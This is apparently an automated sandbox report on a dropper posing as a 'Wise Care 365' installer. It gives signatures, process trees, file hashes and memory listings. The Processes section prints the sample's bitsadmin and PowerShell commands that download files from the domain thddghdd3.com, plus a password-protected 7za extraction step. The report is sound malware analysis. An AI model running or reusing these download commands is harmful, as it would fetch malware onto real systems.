Malware Analysis Report

2024-10-16 05:00

Sample ID 240726-ffz1saxcqn
Target 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe
SHA256 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da
Tags
discovery dropper execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da

Threat Level: Known bad

The file 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe was found to be: Known bad.

Malicious Activity Summary

discovery dropper execution

Download via BitsAdmin

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-26 04:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-26 04:49

Reported

2024-07-26 04:52

Platform

win7-20240704-en

Max time kernel

148s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ConsoleApp\7za.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2920 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 2920 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 2920 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 2920 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 2920 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 2920 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 2920 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 1284 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 1284 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 1284 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 1284 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 1284 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 1284 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 1284 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 1284 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 1448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2264 wrote to memory of 1448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2264 wrote to memory of 1448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2264 wrote to memory of 1448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 544 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 544 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 544 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 544 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 544 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 544 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 544 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 544 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 544 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 544 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 544 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 544 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1284 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
PID 1284 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
PID 1284 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
PID 1284 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
PID 1284 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
PID 1284 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
PID 1284 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
PID 2688 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
PID 2688 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
PID 2688 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
PID 2688 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
PID 2688 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
PID 2688 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
PID 2688 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe

"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp" /SL5="$C0150,38098121,731648,C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"

C:\ProgramData\ConsoleApp\7za.exe

7za.exe x -y -p1r7d2kvUf3 "*.7z"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe

"C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe"

C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp

"C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$301D2,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 thddghdd3.com udp
US 8.8.8.8:53 thddghdd3.com udp

Files

memory/2920-0-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/2920-2-0x0000000000401000-0x00000000004A9000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp

MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

memory/1284-12-0x0000000000400000-0x000000000067B000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\ConsoleApp\ControlSet000.bat

MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7

C:\ProgramData\ConsoleApp\main.bat

MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

\ProgramData\ConsoleApp\7za.exe

MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

memory/2920-57-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/1284-58-0x0000000000400000-0x000000000067B000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe

MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

memory/2688-66-0x0000000000400000-0x0000000000417000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp

MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\ISTask.dll

MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

memory/1832-84-0x0000000000690000-0x00000000006A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\VclStylesInno.dll

MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

memory/1832-90-0x0000000000670000-0x0000000000671000-memory.dmp

memory/1832-88-0x00000000070E0000-0x00000000073FA000-memory.dmp

memory/1832-91-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-93-0x00000000006B0000-0x00000000006B1000-memory.dmp

memory/1832-94-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-92-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-95-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-96-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/1832-97-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-98-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-99-0x00000000006D0000-0x00000000006D1000-memory.dmp

memory/1832-100-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-102-0x0000000001E90000-0x0000000001E91000-memory.dmp

memory/1832-101-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-103-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-104-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-105-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1832-106-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-107-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-111-0x0000000007550000-0x0000000007551000-memory.dmp

memory/1832-110-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-109-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-108-0x0000000007540000-0x0000000007541000-memory.dmp

memory/1832-112-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-113-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-114-0x0000000007560000-0x0000000007561000-memory.dmp

memory/1832-115-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-116-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-118-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-119-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-133-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-145-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-144-0x0000000007600000-0x0000000007601000-memory.dmp

memory/1832-143-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-142-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-141-0x00000000075F0000-0x00000000075F1000-memory.dmp

memory/1832-140-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-139-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-138-0x00000000075E0000-0x00000000075E1000-memory.dmp

memory/1832-137-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-136-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-135-0x00000000075D0000-0x00000000075D1000-memory.dmp

memory/1832-134-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-132-0x00000000075C0000-0x00000000075C1000-memory.dmp

memory/1832-131-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-130-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-129-0x00000000075B0000-0x00000000075B1000-memory.dmp

memory/1832-128-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-127-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-126-0x00000000075A0000-0x00000000075A1000-memory.dmp

memory/1832-125-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-124-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-123-0x0000000007590000-0x0000000007591000-memory.dmp

